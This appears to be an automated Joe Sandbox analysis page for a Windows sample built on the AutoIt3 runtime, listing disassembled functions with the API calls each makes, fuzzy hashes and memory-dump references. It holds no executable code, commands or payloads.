Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: dfd55134cce12b1282c1c9e5be0c256832d289c9ba4464f4f15b1f77a99665e6
Instruction ID: 47de942cbbe62164114384e383b34134963224e566057ac871224faeaf7d9b45
Opcode Fuzzy Hash: dfd55134cce12b1282c1c9e5be0c256832d289c9ba4464f4f15b1f77a99665e6
Instruction Fuzzy Hash: EF111C79901218FFDB11DFA9C985EDDBB78FB48710F2040A5EA04B7250D6716E50DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00961290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00962612: GetWindowLongW.USER32(?,000000EB), ref: 00962623

DefDlgProcW.USER32(?,00000020,?), ref: 009612D8
GetClientRect.USER32(?,?), ref: 0099B84B
GetCursorPos.USER32(?), ref: 0099B855
ScreenToClient.USER32(?,?), ref: 0099B860

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 25db35f242930e5be34dcafb00c855a228308637873a72c25f9f5d2a1d493d2b
Instruction ID: d0e3f1527ab8f5d16ab41feccfc5050931666366815d74e3755556c90158ee81
Opcode Fuzzy Hash: 25db35f242930e5be34dcafb00c855a228308637873a72c25f9f5d2a1d493d2b
Instruction Fuzzy Hash: 49116635A00059AFCB00EFA8D8999FE77B8FB49300F000466FA21E7250C730BE519BA5

Uniqueness

Uniqueness Score: -1.00%

Function 009C1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009C01FD,?,009C1250,?,00008000), ref: 009C166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,009C01FD,?,009C1250,?,00008000), ref: 009C1694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009C01FD,?,009C1250,?,00008000), ref: 009C169E
Sleep.KERNEL32(?,?,?,?,?,?,?,009C01FD,?,009C1250,?,00008000), ref: 009C16D1

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 06844bcdca5754299c847ab4f3accae3eb5db7d9b1d0587bdb5a9eb18e15ec0e
Instruction ID: c6d4ec5b949236ed533173415aaa124eb0de4daf7d1cc418facb0f1f15dc6250
Opcode Fuzzy Hash: 06844bcdca5754299c847ab4f3accae3eb5db7d9b1d0587bdb5a9eb18e15ec0e
Instruction Fuzzy Hash: 3C118E31C1451DDBDF00AFA5DA88BEEBB78FF0A751F04405AE940B6241CB3099609B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00997207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0099722B

Part of subcall function 00997912: __fltout2.LIBCMT ref: 0099793B

__cftog_l.LIBCMT ref: 00997251
__cftoe_l.LIBCMT ref: 00997283

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: b392937c753655afbb4412c14e8dfe80370e7199380e0095c0d3298323eac172
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: F9014C3606814ABBCF125FC8CC018EE7F66BF69355F588615FA2858031DA37C9B1AB85

Uniqueness

Uniqueness Score: -1.00%

Function 009EB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 009EB59E
ScreenToClient.USER32(?,?), ref: 009EB5B6
ScreenToClient.USER32(?,?), ref: 009EB5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 009EB5F5

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 49767159bc74e7c50b975ba12be3a37fc5a74f3963673d08c554ef6dd8ce0f37
Instruction ID: 1abbb222af3163a2faf398110c95949f5225477e15ec76085b79bb6dfece6e30
Opcode Fuzzy Hash: 49767159bc74e7c50b975ba12be3a37fc5a74f3963673d08c554ef6dd8ce0f37
Instruction Fuzzy Hash: 591143B9D0424DEFDB41CFA9D8849EEFBB9FB08310F108166E914E3220D735AA559F90

Uniqueness

Uniqueness Score: -1.00%

Function 009EB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009EB8FE
_memset.LIBCMT ref: 009EB90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A27F20,00A27F64), ref: 009EB93C
CloseHandle.KERNEL32 ref: 009EB94E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 45e2a77c17f6d591b522f2e5e1108445b9441f7f9787024f56d07f8a4416d2cc
Instruction ID: 50ad84970be6ff7ce8b23fc4d5b8d055a8b8eb7d3dacb8b336b825be37b920fd
Opcode Fuzzy Hash: 45e2a77c17f6d591b522f2e5e1108445b9441f7f9787024f56d07f8a4416d2cc
Instruction Fuzzy Hash: 01F089B154C3507BF2206BA9AD45F7F3A5CDB08754F004031BB08D6296D7714E01C7B8

Uniqueness

Uniqueness Score: -1.00%

Function 009C6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 009C6E88

Part of subcall function 009C794E: _memset.LIBCMT ref: 009C7983

_memmove.LIBCMT ref: 009C6EAB
_memset.LIBCMT ref: 009C6EB8
LeaveCriticalSection.KERNEL32(?), ref: 009C6EC8

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: b476adf8b8e529b489fc8cb096230814866a29a7d32b24acf8335cb289a59867
Instruction ID: 06002adee3a973a9012a3f396ea31fe6be1949b05b7e79218844977b8509d958
Opcode Fuzzy Hash: b476adf8b8e529b489fc8cb096230814866a29a7d32b24acf8335cb289a59867
Instruction Fuzzy Hash: 31F05E3A604200ABCF016F55DC85F8ABB2AEF85320B14C065FE085F32AC731A911DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 009EC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 009612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0096134D
Part of subcall function 009612F3: SelectObject.GDI32(?,00000000), ref: 0096135C
Part of subcall function 009612F3: BeginPath.GDI32(?), ref: 00961373
Part of subcall function 009612F3: SelectObject.GDI32(?,00000000), ref: 0096139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 009EC030
LineTo.GDI32(00000000,?,?), ref: 009EC03D
EndPath.GDI32(00000000), ref: 009EC04D
StrokePath.GDI32(00000000), ref: 009EC05B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 4095fada6ee7ab9d7a50b3eefdcca5bb351ed8a64a889b9ae249d1fefd263a8c
Instruction ID: eb3d4812f4156a67a64810d0a771c8f2dec54ab672d0330252ddbf7e928445d6
Opcode Fuzzy Hash: 4095fada6ee7ab9d7a50b3eefdcca5bb351ed8a64a889b9ae249d1fefd263a8c
Instruction Fuzzy Hash: C8F05E32009299FBDB22AF95AC09FDE3F59AF05312F044051FA11650E287755A62DB95

Uniqueness

Uniqueness Score: -1.00%

Function 009BA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009BA399
GetWindowThreadProcessId.USER32(?,00000000), ref: 009BA3AC
GetCurrentThreadId.KERNEL32 ref: 009BA3B3
AttachThreadInput.USER32(00000000), ref: 009BA3BA

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: f059b49318e72783e2c9748f1c0232fd1e50b9b9c6ebc996e6d6e61373bacce7
Instruction ID: 8711aa3491dee18783f63d379e041c5f83abc9884c0fdb86c63f1f9af419c6b8
Opcode Fuzzy Hash: f059b49318e72783e2c9748f1c0232fd1e50b9b9c6ebc996e6d6e61373bacce7
Instruction Fuzzy Hash: 3CE0C93154936CBBDB205BA2DD4DEDB7F5CEF16BA1F008026F509990A0C6758940EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00962218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00962231
SetTextColor.GDI32(?,000000FF), ref: 0096223B
SetBkMode.GDI32(?,00000001), ref: 00962250
GetStockObject.GDI32(00000005), ref: 00962258
GetWindowDC.USER32(?,00000000), ref: 0099C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0099C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0099C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0099C112
GetPixel.GDI32(00000000,?,?), ref: 0099C132
ReleaseDC.USER32(?,00000000), ref: 0099C13D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: dc24bc77b5ee692103be8d7e6dc83411bd174ea0d75adda039e96ad6f090d400
Instruction ID: 21043fb445a416afbe4ce6bf6e5f4b1cbe0576f564a465659e05e0dc95d34d35
Opcode Fuzzy Hash: dc24bc77b5ee692103be8d7e6dc83411bd174ea0d75adda039e96ad6f090d400
Instruction Fuzzy Hash: 6BE06531118184EAEF215F68FC5D7D83B14EB15336F008367FA794C0E187714984EB11

Uniqueness

Uniqueness Score: -1.00%

Function 009B8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 009B8C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,009B882E), ref: 009B8C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009B882E), ref: 009B8C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,009B882E), ref: 009B8C7E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 65b9be1a84873d1549864205b1cb2c1dda09233eb7c193515601290670890e9f
Instruction ID: 1af4956e2404fe06f32451df110d7374a78a6b9452cef4c22a530c883ddb6872
Opcode Fuzzy Hash: 65b9be1a84873d1549864205b1cb2c1dda09233eb7c193515601290670890e9f
Instruction Fuzzy Hash: 69E02672616210DBD7205FB06E0CB973BACEF547A2F044828B285DD040DA308846DB20

Uniqueness

Uniqueness Score: -1.00%

Function 009A2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 009A2187
GetDC.USER32(00000000), ref: 009A2191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 009A21B1
ReleaseDC.USER32(?), ref: 009A21D2

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 6339ed014fd2dce24cb5a321658805ccfa8e83f7b8d8ac560baaf59b00910bfe
Instruction ID: c75b41224f0a3b330852fc60d3bd37a6b0ff476b85362fa1cfd26d54074c6dcb
Opcode Fuzzy Hash: 6339ed014fd2dce24cb5a321658805ccfa8e83f7b8d8ac560baaf59b00910bfe
Instruction Fuzzy Hash: E9E01AB5814208EFDF019FA0C858BAD7BF5FB4C751F10C826F95A9B220CB388941AF40

Uniqueness

Uniqueness Score: -1.00%

Function 009A219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 009A219B
GetDC.USER32(00000000), ref: 009A21A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 009A21B1
ReleaseDC.USER32(?), ref: 009A21D2

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 86f6d6d282b89af91db455448a6aa2bacd95add0ef991fb652ac39e6c2bb2b27
Instruction ID: a9ac51c648ff975ee3d968c3a962933ae0a7e8aab311d972e26d5a8077557117
Opcode Fuzzy Hash: 86f6d6d282b89af91db455448a6aa2bacd95add0ef991fb652ac39e6c2bb2b27
Instruction Fuzzy Hash: 5AE01AB5814208EFDF019FB0C85869D7BF5FB4C711F10C426F95A9B220CB389941AF40

Uniqueness

Uniqueness Score: -1.00%

Function 009BB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 009BB981

Strings

Container, xrefs: 009BB8FE
AutoIt3GUI, xrefs: 009BB8F9

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 6bb5735b462df4e8cbd7254b15730067d7e4d4358541f07971a1bdfd61d599bb
Instruction ID: 752a995a8251325068d7ff522e164ced66074da39aba22795196baec3767dda1
Opcode Fuzzy Hash: 6bb5735b462df4e8cbd7254b15730067d7e4d4358541f07971a1bdfd61d599bb
Instruction Fuzzy Hash: 20915C706006019FDB64DF68C994BAABBF9FF48720F14856DF94ACB291DBB0E840CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009CB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0097FEC6: _wcscpy.LIBCMT ref: 0097FEE9

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

__wcsnicmp.LIBCMT ref: 009CB298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 009CB361

Strings

LPT, xrefs: 009CB292

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: be426df5390a944b29b7419f88634434b746804c235be9674ecee7851e831221
Instruction ID: 3ce04ee9a5b41b7dc3afa766a3161f9f489132d764f1dcb74e3a7e4950de1d85
Opcode Fuzzy Hash: be426df5390a944b29b7419f88634434b746804c235be9674ecee7851e831221
Instruction Fuzzy Hash: B5618F75E00215AFCB14EF98C892FAEB7B8AF48310F15445EF946AB391DB70AE40CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00972AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00972AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00972AE1

Strings

@, xrefs: 00972AD5

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 8e1d23394256396981a8cf65b6ca36d08c390682743708b021c0c5a229a248d7
Instruction ID: a55353a592b4307fd112e9ecfb7ed6759aa40a8b997236ebb012a173a5bd6f58
Opcode Fuzzy Hash: 8e1d23394256396981a8cf65b6ca36d08c390682743708b021c0c5a229a248d7
Instruction Fuzzy Hash: 735136724187489BD320AF50D886BABBBECFFC5314F42885DF2D9911A5DB308529CB66

Uniqueness

Uniqueness Score: -1.00%

Function 009C99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0096506B: __fread_nolock.LIBCMT ref: 00965089

_wcscmp.LIBCMT ref: 009C9AAE
_wcscmp.LIBCMT ref: 009C9AC1

Strings

FILE, xrefs: 009C99FA

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: f709b18e6b4bd473165ea015249a2a10e6cab5ea12e99d1a27d931b8e7a571da
Instruction ID: 08c49ed83427f39188864a847b1bc49fa56143e3d375caf3089444b73bcd6ee6
Opcode Fuzzy Hash: f709b18e6b4bd473165ea015249a2a10e6cab5ea12e99d1a27d931b8e7a571da
Instruction Fuzzy Hash: AD41C471A00619BADF20ABA4DC45FEFBBBDEF85710F014469B904A7181DA75AE0487A2

Uniqueness

Uniqueness Score: -1.00%

Function 009D2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009D2892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009D28C8

Strings

|, xrefs: 009D2899

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: bf49da6918a9df2b40f06b3f9049b6f456316e359c0a9e18dc473d6683918f9b
Instruction ID: 4195a07fcb381ab43f9dda34461c74db869f23dc1f99d6fb30485bed6343eadf
Opcode Fuzzy Hash: bf49da6918a9df2b40f06b3f9049b6f456316e359c0a9e18dc473d6683918f9b
Instruction Fuzzy Hash: 04311971800119AFCF01EFA1CC85EEEBFB9FF58314F10406AF815A6266DB315A56DBA0

Uniqueness

Uniqueness Score: -1.00%

